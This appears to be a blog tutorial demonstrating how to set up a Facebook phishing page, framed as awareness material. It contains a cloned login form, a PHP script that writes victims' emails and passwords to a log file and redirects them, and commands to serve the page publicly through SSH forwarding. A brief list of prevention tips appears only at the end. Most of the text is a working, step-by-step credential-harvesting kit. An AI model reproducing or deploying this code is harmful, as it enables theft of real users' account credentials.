Phish be with you not
Phishing attacks on social media have become a pervasive and evolving threat in the digital age. These malicious tactics are designed to deceive individuals into divulging sensitive information, such as login credentials, financial details, or personal information, by impersonating legitimate entities or contacts.
In this example, let me demonstrate to you how easy it is to setup a Facebook phishing link that hackers may use to trick you into giving them your credentials. Take note that this is merely a demonstration and not to be used illegally.
- Cloning the legitimate Facebook login page that will be used to trick the victim. For this demonstration, I have already done a quick search on the internet and compiled the necessary files here.
GitHub: https://github.com/meliodaaf/facebook-login-page - After cloning this repository to your workstation, you need to move the files into the
/var/www/html/directory.
$ git clone https://github.com/meliodaaf/facebook-login-page.git
Cloning into 'facebook-login-page'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 12 (delta 2), reused 8 (delta 1), pack-reused 0
Receiving objects: 100% (12/12), 52.55 KiB | 854.00 KiB/s, done.
Resolving deltas: 100% (2/2), done.
$ sudo mv facebook-login-page/ /var/www/html/
$ cd /var/www/html
$ tree
.
└── facebook_signin
├── ArtOfLove.html
├── facebook.png
├── fb.ico
├── logs.txt
├── post.php
├── README.md
└── style.css
1 directory, 7 files3. Let’s take a look at the two most important files in our demonstration, the ArtOfLove.html and the post.php.
The HTML file contains the Facebook sign in page, and the reason why it is named this way is to trick our victim into thinking that this is a legitimate page about love.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="style.css">
<link rel="icon" href="fb.ico" type="image/x-icon">
<title>Facebook - Log In or Sign Up</title>
</head>
<body>
<div class="intro">
<img src="facebook.png" alt="">
<h2>Connect with friends and the world around you on Facebook.</h2>
</div>
<div class="form">
<form action="post.php" method="POST">
<input type="text" id="email_or_phone" name="email_or_phone" placeholder="Email or Phone Number" required><br>
<input type="password" id="password" name="password" placeholder="Password" required><br>
<button type="submit">Log In</button><br>
<a href="#">Forgot Password</a>
<hr>
<button class="secondary_btn">Create New Account</button>
</form>
<p><a href="#" class="secondary_link">Create a Page</a> for a celebrity, brand, or business.</p>
</div>
</body>
</html>The PHP file is the one that will save the victim’s input into a text file named log.txt for later usage. Take note of the header which contains the location where the victim will be redirected after logging into our fake facebook.
<?php
$file = fopen("logs.txt", "a");
if ($file) {
foreach ($_POST as $variable => $value) {
fwrite($file, $variable . "=" . $value . "\r\n");
}
fclose($file);
} else {
echo "Error: Unable to open the file for writing.";
}
header("Location: https://tinybuddha.com/blog/10-ways-let-go-open-love/");
exit;
?>4. Let’s enable apache2 on our attacker machine and expose our site to the internet using a serveo ssh forwarding site.
In serveo, we will expose our fake site using the subdomain the lovers keyword.
$ sudo service apache2 start
$ ssh -R lovers:80:localhost:80 serveo.net
Forwarding HTTP traffic from https://lovers.serveo.net5. Testing our site https://lovers.serveo.net from the internet. Here, you can see that the folder containing our facebook page. Of course, this is not going to be the link that will be provided to the victim.
6. Accessing the link intended for the victim, https://lovers.serveo.net/facebook_signin/ArtOfLove.html .
7. Let’s try to login if we’ll be able to log our Username and Password into our logs.txt file.
As you can see, the email address and the password was logged and we were able to redirect to https://tinybuddha.com/blog/10-ways-let-go-open-love/ after logging in.
8. So how do we prevent phishing? Here are some tips on how we can avoid phishing attacks.
- Education and Awareness
- Use Strong, Unique Passwords
- Enable Multi-Factor Authentication (MFA)
- Verify Email Senders
- Avoid Clicking on Suspicious Links
- Check Website Authenticity
